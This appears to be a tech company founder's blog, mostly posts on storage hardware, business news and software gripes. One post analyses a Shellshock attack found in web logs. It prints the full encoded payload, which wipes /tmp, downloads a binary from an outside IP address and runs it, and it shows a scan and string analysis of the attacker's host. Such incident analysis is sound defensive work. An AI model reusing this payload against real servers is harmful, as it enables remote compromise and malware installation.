The world’s fastest hyper-converged appliance is faster and more affordable than ever

This is a very exciting hyper-converged system, representing our next generation of time series and big data analytical systems. It couples tremendous internal bandwidth with massive internal parallelism and a minimal-latency network design. This unit has been designed to deliver the maximum possible performance in as minimal a footprint … both in rack space and in cost … as possible.

You can use these as independent standalone units, or integrate them into a larger FastPath Unison system.

We have our software stack (SIOS) integrated onto each unit, and include our builds of Python + Pandas/SciPy/NumPy, R, and Perl. We pre-install and configure Kx’s excellent kdb+ (the 32-bit version; we also provide a 64-bit install, though you will need to get your own license file) and InfluxDB (http://influxdb.com) with our interface to it (https://github.com/joelandman/influxdbcli). That interface will soon be able to speak to many databases and help you do ETL and other data motion/transformation operations across multiple platforms. The units all include our sios-metrics tools (https://github.com/joelandman/sios-metrics) for monitoring.

We’ve sold a number of these units in recent days. Looking to bring one with me to HPC on Wall Street next month (might be the 4U 48 bay version though).

It’s a very exciting time right now, lots of good things happening. More soon … I promise.

Interesting Q1 so far for day job

Our Q1 is usually quiet, fairly low key. Not this one. Looks like lots of pent-up demand. We are deep into record territory, running 200+% of normal, with the possibility of more.

Another new wrinkle is that our small investment round is mostly complete. This is new territory for us, and you may have noticed I’d backed off posting intensity over the last half year or so while this was going on. It’s a long, complex, and annoying experience in many regards. I won’t detail it here. But I will say that we are grateful to those who believed in our business enough to bet on it.

Many other things are happening, not the least of which is the complete validation of what we’ve been talking about for years with tightly coupled computing. While the industry calls this “hyperconverged”, and we are fine to adopt that moniker, our points about this being pretty much the only realistic path forward to build scalable infrastructure (see what I did there? Didja?) are being trumpeted loudly by numerous companies and analysts. It helps when they raise $100M+ (dear lord!) to pursue this market, and the press continues its very favorable reporting of it. This said, over the last 6 months, people have stopped asking us what tightly coupled/hyperconverged computing means, and started asking what the issues are.

And that gets me to the last bit. We are starting to see people really get another of our core messages. Performance matters. You can’t cost effectively build/run inefficient systems at any scale, even in a cloud …. no …. especially not in a cloud, and hope to maximize the impact and effectiveness of your expenditure. Armies of crappy/inefficient machines shared amongst many people are inefficient machines. This is fine for web servers. This is double plus ungood for big data analytics and storage. You need performant, efficient systems for this. This has been our message with tightly coupled/hyperconverged systems. This is why our small machines bested machines with 2-4x the processing power, 2-4x the RAM, and 10x the number of spindles on STAC M3 tests over the years.

As I say these days, you can’t fake performance.

More soon. Really. The team wants me to blog more … and I am guessing this means at work.

Π day has come

I like Π … apple, cherry, etc.

For those who don’t get the pun, dates in the US are often written as Month/Day/Year, with the year abbreviated to 2 digits. So with this formatting, today is 3/14/15, or roughly the first 5 digits of Π, which is defined to be the ratio of a circle’s circumference to its diameter in a 2D plane.

You can extend the pun by noting that at 9:26:53 it is “more precise”.
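For the curious, here is a small sketch of the digit matching behind the pun. It is only an illustration: the function name `pi_prefix_length` is mine, and the digits of Π come from Python's double precision `math.pi`, which is good for about 15 digits.

```python
import math
from datetime import datetime

def pi_prefix_length(moment: datetime) -> int:
    """Count how many leading digits of pi a US-style timestamp reproduces."""
    # Month, 2-digit day, 2-digit year, then hour, minute, second, no separators.
    stamp = (
        f"{moment.month}{moment.day:02d}{moment.year % 100:02d}"
        f"{moment.hour}{moment.minute:02d}{moment.second:02d}"
    )
    pi_digits = str(math.pi).replace(".", "")
    count = 0
    for ours, theirs in zip(stamp, pi_digits):
        if ours != theirs:
            break
        count += 1
    return count

# Midnight on 3/14/15 matches 5 digits; 9:26:53 that morning matches 10.
print(pi_prefix_length(datetime(2015, 3, 14, 0, 0, 0)))
print(pi_prefix_length(datetime(2015, 3, 14, 9, 26, 53)))
```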

It is generally nonsensical, but it’s a fun excuse to make/get a pie and share it with family/friends.

We had a peach Π at the office yesterday. Yum!

For what it’s worth, I prefer a different date format, day-Month_name-Year, and it’s rather hard there to get to Π day, so I am going to borrow this one and enjoy it with the family.

Has Alibaba been compromised?

I saw this attack in the day job’s web server logs today. From IP address 198.11.176.82, which appears to point back to Alibaba.

This doesn’t mean anything in and of itself, until we look at the payload.

()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;echo%20wget%20http://115.28.231.237:999/htrdps%20-O%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20echo%20By%20China.Z%20%3E%3E%20/tmp/Run.sh;echo%20chmod%20777%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20rm%20-rf%20/tmp/Run.sh%20%3E%3E%20/tmp/Run.sh;chmod%20777%20/tmp/Run.sh;/tmp/Run.sh/x22

This appears to be an attempt to exploit a bash hole. What is interesting is the IP address the second-stage payload gets pulled from.
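If the percent-encoding makes the request hard to read, a few lines of Python will decode it without running anything. This is a minimal sketch on the leading part of the logged string. The `() { :; };` prefix it reveals is the signature of the Shellshock bash bug. Treating the `/x22` in the log as an escaped double quote is my assumption about how the log mangled it.

```python
from urllib.parse import unquote

# Leading fragment of the logged request, copied from the payload above.
logged = (
    "()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;"
    "echo%20wget%20http://115.28.231.237:999/htrdps%20-O%20/tmp/China.Z-thpwx"
    "%20%3E%3E%20/tmp/Run.sh"
)

# Decode the percent-escapes only; nothing here executes the command.
decoded = unquote(logged)

# Assumption: "/x22" stands in for an escaped double quote (hex 22).
readable = decoded.replace("/x22", '"')
print(readable)
```

Decoded, the request wipes /tmp, then builds up a Run.sh script one echo at a time that fetches the second stage from port 999.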

Run a whois against that … I’ll wait.

In the records we see a number of things:

inetnum	115.28.0.0 - 115.29.255.255
netname	ALISOFT
descr	Aliyun Computing Co., LTD
descr	5F, Builing D, the West Lake International Plaza of S&T
descr	No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099
country	CN

...

 
phone	+86-[redacted]
e-mail	[redacted]@alibaba-inc.com
nic-hdl	ZM1015-AP
mnt-by	MAINT-CNNIC-AP
changed	ipas@cnnic.net 20130730
source	APNIC

...

I hand-redacted the name/email/phone from the record. They are easy enough to find, but note the email address.

Who is Alisoft?

Well, according to Crunchbase:

Alisoft develops, markets and delivers Internet-based business management software targeting Small and Medium Enterprises (SMEs) in China. Founded by parent Alibaba Group, Alisoft is currently offering five different services: Customer relationship management (CRM), Inventory management, Sales force management, Financial tools, and Marketing information.

This could be simply one compromised machine. Never attribute to malice that which may be better explained by incompetence. They wouldn’t leave a machine wide open, right?

landman@lightning:~$ nmap 115.28.231.237

Starting Nmap 6.40 ( http://nmap.org ) at 2015-03-11 19:30 EDT
Nmap scan report for 115.28.231.237
Host is up (0.26s latency).
Not shown: 985 closed ports
PORT     STATE    SERVICE
42/tcp   filtered nameserver
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
999/tcp  open     garcon
1023/tcp filtered netvenuechat
1025/tcp filtered NFS-or-IIS
1068/tcp filtered instl_bootc
1434/tcp filtered ms-sql-m
3389/tcp open     ms-wbt-server
4444/tcp filtered krb524
5800/tcp filtered vnc-http
5900/tcp filtered vnc
6669/tcp filtered irc

oh … well … maybe …

Ok, but this wouldn’t be conspicuously serving and easily accessible on that port 999, right? So let’s fire up links and see what we see …



Oh … my.

Ok, for laughs, let me pull down the payload. And look at it with strings. See if I see anything in there.

strings /tmp/evil

...

$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. $
PROT_EXEC|PROT_WRITE failed.

Ok, it’s UPX compressed. Let’s look into it some more.

landman@lightning:/tmp$ upx-3.91-amd64_linux/upx -l evil 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   1513570 ->    416596   27.52%  netbsd/elf386  evil

and sure enough

landman@lightning:/tmp$ ls -al evil 
-rw-r--r-- 1 landman landman 1513570 Mar 11 19:36 evil

landman@lightning:/tmp$ file evil
evil: ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped

Again, run strings and … whoa! Someone used a -g when compiling, there are a metric butt-load of symbols in there. Seriously … It’s obviously C++ source as it turns out, and it’s been internationalized.

And there are misspellings …

19CThreadAttackKernal

It seems to want to play with TLS. I am guessing not in a good way.

But this said, I was looking for another address, either IP address or web address, or something.

Sure enough, strings found this

www.baidu.com

...

8.8.8.8
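If you would rather not eyeball pages of strings output, the hunt for addresses can be scripted. What follows is only a sketch of the idea, not what I ran. The helper names `printable_strings` and `network_indicators` are made up, the regexes are deliberately crude, and the sample bytes are invented for illustration rather than taken from the actual binary.

```python
import re

def printable_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Return runs of printable ASCII, roughly what `strings` prints."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [run.decode("ascii") for run in re.findall(pattern, data)]

# Crude patterns: dotted quads and a handful of top level domains.
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST = re.compile(r"\b(?:[a-z0-9-]+\.)+(?:com|net|org|cn)\b", re.IGNORECASE)

def network_indicators(strings: list[str]) -> list[str]:
    """Pick out anything that looks like an IP address or a hostname."""
    hits = []
    for text in strings:
        hits.extend(IPV4.findall(text))
        hits.extend(HOST.findall(text))
    return hits

# Made-up sample bytes standing in for a slice of an unpacked binary.
sample = b"\x00\x01www.baidu.com\x00\xff\x7fELF\x008.8.8.8\x00junk"
print(network_indicators(printable_strings(sample)))
```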

In the end I did this

landman@lightning:/tmp$ rm -f evil

Were it really so simple.

Next up, I may send them an email pointing out the … er … badly misconfigured unit, and the attack server set up on it. And the attack coming from their site at a different address.

This reminds me of the Moscow rules. Once is an accident, twice is coincidence. Three times is enemy action.

A completely unsolved problem

Contact management across multiple devices/OSes/applications. Yeah, I know, just use iCloud/Gmail/etc.

Except they are all broken. And not a little bit.

I rely upon one, consistent, correct contact list that has email, phone, etc. for all the people I know and communicate with. In years past, I’ve had this list sync back and forth to Gmail via Google. And it used to work.

Then iPhone 5 and well, ya know, it broke. Not so curiously, iPhone also broke Google Calendar integration. And while we were at it, Google seemed to break the various apps that used to work with it perfectly for Thunderbird email integration.

Same list, sometimes it would sync. Sometimes not.

The iPhone 5 would wind up doing something that looked like a massive blow up in the number of contacts. As you added more contacts, things slowed down. Drastically. Tremendously. All aspects of the phone were slower. Nothing was fast.

Same with Thunderbird. And all the other mail apps. Everywhere.

Phone dialing was a joke thereafter. Contact list would take 10-30 seconds to show up. I kid you not.

I would dial a number, the screen would remain blank while I heard it go through, but with no controls, save an on-off button.

This was true on iOS and Android. On Thunderbird, as the size of the contact list exploded from about 2k names to 20k names, address completion would lock up the client.

Ok, there are a few issues here. I’ll take a wild guess, but should I assume that someone is using an O(n^2) algorithm for sorting lists? Or full “table” scans for lookup? I have doubts that a quad core CPU such as the one in the Android phone can be so easily swamped.
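To make the guess concrete, here is a sketch of the difference between a full scan on every keystroke and a lookup against a list that was sorted once. I have no idea what the actual clients do internally. The function names are hypothetical and the contact names are toy data.

```python
import bisect

def linear_complete(names, prefix):
    """Full scan: every lookup touches every contact, O(n) per keystroke."""
    p = prefix.lower()
    return [n for n in names if n.lower().startswith(p)]

def build_index(names):
    """Sort once, O(n log n), so later lookups can binary search."""
    return sorted(n.lower() for n in names)

def indexed_complete(index, prefix):
    """Binary search for the prefix range: O(log n) plus the matches returned."""
    p = prefix.lower()
    lo = bisect.bisect_left(index, p)
    # Upper bound: the prefix followed by the largest possible code point.
    hi = bisect.bisect_left(index, p + chr(0x10FFFF))
    return index[lo:hi]

names = ["Alice", "alan", "Bob", "Albert", "Carol"]
index = build_index(names)
print(linear_complete(names, "al"))
print(indexed_complete(index, "al"))
```

At 20k names the scan is still only 20k string compares, which a phone should shrug off. That is why I suspect something worse than linear is going on.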

The problem with the contact lists appears to be in part on the server side, and in part on the client side. The clients appear to be fairly dumb. But so are the servers. Bi-directional sync is the cause of the massive explosion of contacts (10x per day, growing exponentially). This leads to all manner of interesting behaviors being exposed.

Basically I think we need to re-think the contact list. I think it is horribly broken across pretty much all clients at the moment. The only saving grace on the server side is the duplicate removal. It allows me to iteratively repair a list gone horribly wrong.
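The duplicate removal idea is simple enough to sketch. This is my own illustration, not what any of the servers actually do: the field names (`name`, `email`, `phone`) and the choice to keep the first copy seen are assumptions.

```python
def contact_key(contact: dict) -> tuple:
    """Normalize the fields assumed to identify a person."""
    name = " ".join(contact.get("name", "").lower().split())
    email = contact.get("email", "").strip().lower()
    phone = "".join(ch for ch in contact.get("phone", "") if ch.isdigit())
    return (name, email, phone)

def dedupe(contacts: list) -> list:
    """Keep the first copy of each contact, in original order."""
    seen = {}
    for contact in contacts:
        seen.setdefault(contact_key(contact), contact)
    return list(seen.values())

# Toy data: the second entry is the first one after a sloppy sync round trip.
contacts = [
    {"name": "Jane Doe", "email": "jane@example.com", "phone": "555-0100"},
    {"name": "jane  doe", "email": "Jane@Example.com ", "phone": "(555) 0100"},
    {"name": "John Roe", "email": "john@example.com", "phone": "555-0199"},
]
print(len(dedupe(contacts)))
```

Running it again on its own output changes nothing, which is the property you want from anything sitting inside a sync loop.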

This said, I think I’ve found my next project. A proper, and intelligent (and secure at that) cloud based server handling contact data. A sane set of clients for Android and iOS to correctly populate/manage/update. A sane set of clients for Thunderbird etc. to locally populate. An easy way to backup, restore, browse, search, integrate, separate, and otherwise manage the data.

And if someone else has already done this, so as to save me the joy of developing this myself, please let me know. All I find online are fact-free reviews of silly apps that sorta-kinda-but-not-really work.

Scalable Informatics customer Milford Film and Animation does awesome projects

It’s nice to hear success stories from our customers. In this case, our friends and customers at Milford Film and Animation have been using our systems for a number of years to provide the basis for their storage efforts.

Their systems are very computationally, network, and IO intensive. There is a tremendous amount of rendering, editing, and many other things that require absolutely the highest performance you can get in a dense package. Our goal is to make the storage aspect not something they ever need to think about. Make sure it is as performant and reliable as possible.

So we do. And here is an example of their work.

You may have seen other examples of their work at our booth at SC14. A fantastic customer, a terrific use case.

Imagine what we can do for anyone in this space … Our systems run near peak performance and efficiency on a continuous basis for long durations of intensive use. We help our customers be successful … we need them to be successful. And we’ll pull out the stops to make sure that they are, that our kit and capabilities contribute to their success. The rest is up to them.

As you can see from the clip, and the other bits they have, Milford is a wonderful and creative partner to work with. I wish we had many more like them!

My vote for most awesome Mac OSX software

Karabiner. If you switch back and forth between Linux and Mac on the same keyboard, this is an absolute must-have.

From my perspective, the keys in Mac are horribly borked. Home and End do not do what I expect. Control-Anything doesn’t work except in exceptional cases. iTerm2 (also very good Mac software) largely does the right thing on its own, but the keyboard side of MacOSX is basically borked. This lets you unbork it.

That is huge. I’ve been looking for this for years. The page that pointed me to it is here. My google-fu must not have been good in the past, as this is the first time I’d seen this …

What brought this about was sheer frustration at hitting the home key, expecting it to go to the beginning of the paragraph/line in Keynote, and watching it, insanely, go to the beginning of the file. And the same thing with end, though this time to the end of the file.

Seriously, this tool unborks that-which-was-borked.

Memory channel flash: is it over?

[full disclosure: day job has a relationship with Diablo]

Russell just pointed this out to me.

The short (pedestrian) version (I’ve got no information that is not public, so I can’t disclose something I don’t know anyway): Netlist filed a patent infringement suit against Diablo, and then included SanDisk as they bought Smart Storage, who worked with Diablo prior to Smart being acquired by SanDisk. Netlist appears to have won an injunction, at least a temporary one, against Diablo.

Netlist makes fast DIMM chips and has IP in the fast DIMM interface. Yeah, highly simplified, but this is approximately correct. It’s definitely more involved than that, but this is the pedestrian version.

Netlist claimed, and apparently convinced a patent court, that it was being damaged by Diablo’s use of its IP. I know that part is in dispute by Diablo, and I cannot, and will not, comment on the merits of either the suit or any counter-suit.

It seems that part of this injunction involved SanDisk not being allowed to sell/ship its inventory. This aspect was just lifted. But SanDisk cannot acquire any more.

So what does this portend for memory channel flash?

I liked the idea, but for different reasons than others had been talking about in public. I’ve always felt that IO channel memory was a throwback to the old XMM/EMM PC days. What, you don’t remember those days? Putting a windowed ram card in an expansion chassis, addressing it 64kB at a time. It had some utility, but it used up valuable IO space. And it was slower than memory near the CPU. This was cured by using bigger memory address space systems.

Similarly, I looked at memory channel flash as a way to get flash closer to the CPU and away from the valuable IO channel lines. It could never really be primary memory, or even primary storage (a number of pundits suggested as much, and that was a terrible idea). It would be fantastic as a temp space for paging, or for certain types of caching or persistence.

But that’s on hold now, as Diablo and Netlist fight it out.

I’m not happy with this, and had hoped that a nice cross licensing would fix this quickly. Doesn’t look like this is happening though. And as Diablo is a startup, how long will they be able to hold out with revenues falling off? I am guessing they would be an acquisition target now for the likes of SanDisk or others (IBM?) who have more power to push a deal with Netlist.

Not a great situation, though I am still hopeful for the Diablo team and the product. It looks really good, and we have a great use case.

Netlist isn’t a patent troll, they are a legitimate technology company with interesting low latency memory DIMM technology. They came to our attention a number of years ago when we had very focused HFT customers trying to eke out any advantage anywhere. Diablo has been making good things IMO. I do wish there was a way to make this work for all.

New all-flash-array: SanDisk’s Infiniflash

Interesting development from SanDisk. Not quite an M&A bit, but an attempt at accelerating adoption of non-spinning storage by bringing out a proof of concept product in a few flavors. They are aiming at $2/GB for this system.

This is an array product though, so you need to attach it to a set of servers. Also, for something this large, the specs are kind of disappointing. 7GB/s maximum and 1M IOPS. Density up to 1/2 PB in 3U. We are currently at 1/4 PB in 4U, combined with a massive IO/compute/network capability, so that part is interesting. Our next gen will put that to shame though.

Not for nothing, but siFlash did 30+GB/s at much more than 1M IOPS (in an end user/real world test) 2 years ago. Indeed our new range of Cadence devices are … significant steps up from this … . Sadly, for that test, thanks to SanDisk’s acquisitive nature, our supplier for SSDs was bought, they jacked up the price of our drives, and drove the customer to seek other, low performance and low cost options. I don’t precisely know how they are doing, but I get the sense that they may realize you can’t fake performance, which is a problem if what you need, is, performance.

What makes this interesting is that this is a shot across the bows of Violin, Kaminario, Pure, Skyera, and many others. We don’t see this as particularly competitive in our space (Big Data appliances), as it’s a pure storage array. Moreover, our spinning disk systems do 7GB/s sustained, have integrated computers, 10GbE, 40GbE, IB, and in very short order, something much faster.

Moreover, Wikibon and others predict that the SAN market (that this is very much a play for) is in decline. Building new SAN elements today probably isn’t a good long term strategy.



But, understand what SanDisk wants to do. They want to spur adoption of flash. They want to be able to generate sufficient demand so that they can build more flash, more flash fab lines (not cheap!).

There are many contenders for the next generation of non-volatile memory (NVM). All of these contenders may have interesting advantages or drawbacks relative to flash. Flash’s big one is the limited number of write cycles. This said, I don’t see flash going away any time soon. Industry momentum is built up by folks like SanDisk pushing hard on things like this.

If anything, this will likely spur other vendors to either build or buy their own version of this. Moreover, with the advent of Big Data, dumb arrays are basically on the way out as Wikibon (and many others) have noted. This is part of why folks like EMC were looking for new things to freshen their business last year. They are arrays and filer heads. And other things in the federated company, but that’s the storage side.

So I expect this announcement to light fires under folks like WD/HGST (hey, look, they just bought Amplidata), Seagate (Xyratex), SanDisk (Fusion-io). Toshiba still hasn’t gotten into this game.

But I expect things like this to drive more M&A.

M&A: HGST acquires Amplidata

This is closer to home. Amplidata is an erasure coded cold storage system atop “cheap” hardware. HGST makes, of course, storage devices.

This continues a trend in vertical integration of folks with systems experience, and folks who make the things that go into these systems. If you control more of the stack, you can create more value to your bottom line … up to a point.

The flip side to this is if you start competing with your customers. This is a good way to kill a channel, and drive customers to your competitors.

The only major tier 1 vendor I don’t see doing this now is Toshiba. HGST/WD, Seagate, SanDisk are all building vertically, with integrated units of one sort or another.

All these systems will compete with some segment of their customer base though. Finding and striking that balance is important. Where you can add value (cold storage, big data, massive performance storage) is where they could play nicely.

I do expect this to be fairly disruptive to a number of vendors in the space. Should be quite interesting.
